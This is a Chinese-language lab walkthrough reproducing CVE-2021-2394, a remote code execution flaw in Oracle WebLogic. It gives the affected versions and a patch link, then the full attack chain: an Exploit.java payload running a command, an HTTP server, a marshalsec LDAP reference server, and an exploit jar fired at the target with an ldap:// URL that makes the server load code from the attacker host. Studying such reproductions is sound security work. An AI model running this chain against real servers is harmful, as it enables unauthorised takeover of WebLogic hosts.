CVE-2021-2394

一、简介

​ oracle公司在2021年7月重要补丁更新报告中,通告中披露了WebLogic组件存在高危漏洞,攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞的WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。

clipboard

二、复现环境:

平台:

Code
1
2
	windows 10 
​	kali2021

工具:

Code
1
2
3
4
5
6
	jdk8  (注意,安装目录不可有空格) 
​	weblogic_12.2.1.3.0
​	maven3.8.2 
​	marshalsec 
​	exp 
​	python3

三、受影响版本

Code
1
2
3
4
5
6
7
8
9
	Oracle WebLogic Server 10.3.6.0.0

​	Oracle WebLogic Server 12.1.3.0.0

​	Oracle WebLogic Server 12.2.1.3.0

​	Oracle WebLogic Server 12.2.1.4.0

​	Oracle WebLogic Server 14.1.1.0.0

四、修复方式

官方已发布补丁。

官方下载链接:https://www.oracle.com/security-alerts/cpuapr2021.html

五、复现过程

1、安装

Code
1
java -jar fmw_12.2.1.3.0_wls.jar

安装过程如环境搭建文档,下载weblogic 12.2.1.3.0并安装

img

**2、[攻击机]**创建Exploit.java,通过javac编译得到Exploit.class

cmd
1
javac Exploit.java   // 编译
java
1
2
3
4
5
6
7
8
9
10
11
//Exploit.class 
public class Exploit {     
    static {        
        System.err.println("Pwned");        
        try {            
            String cmds = "calc";            					         			 Runtime.getRuntime().exec(cmds);  //执行命令        
        } catch ( Exception e ) {           
            e.printStackTrace();        
        }    
    } 
}

**3、[攻击机]**jar目录下 使用python开启一个http服务,并使用marshalsec开启JNDI服务

下载marshalsec工具

https://github.com/mbechler/marshalsec

编译

Code
1
mvn clean package -DskipTests

clipboard

4、开启PYTHON服务【marshalsec.jar目录下】

Code
1
python -m http.server 8000

clipboard

开启JNDI服务【marshalsec.jar目录下】

Code
1
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.24.129:8000/#Exploit" 8087

1629912643

5、[攻击机]下载EXP

https://github.com/lz2y/CVE-2021-2394/releases/tag/2.0

运行【一条命令】

Code
1
java -jar CVE_2021_2394.jar 192.168.24.132 7001 ldap://192.168.24.129:8087/Exploit

clipboard

攻击成功

六、流量

clipboard-1630462621155

第一条流量

clipboard-1630462633173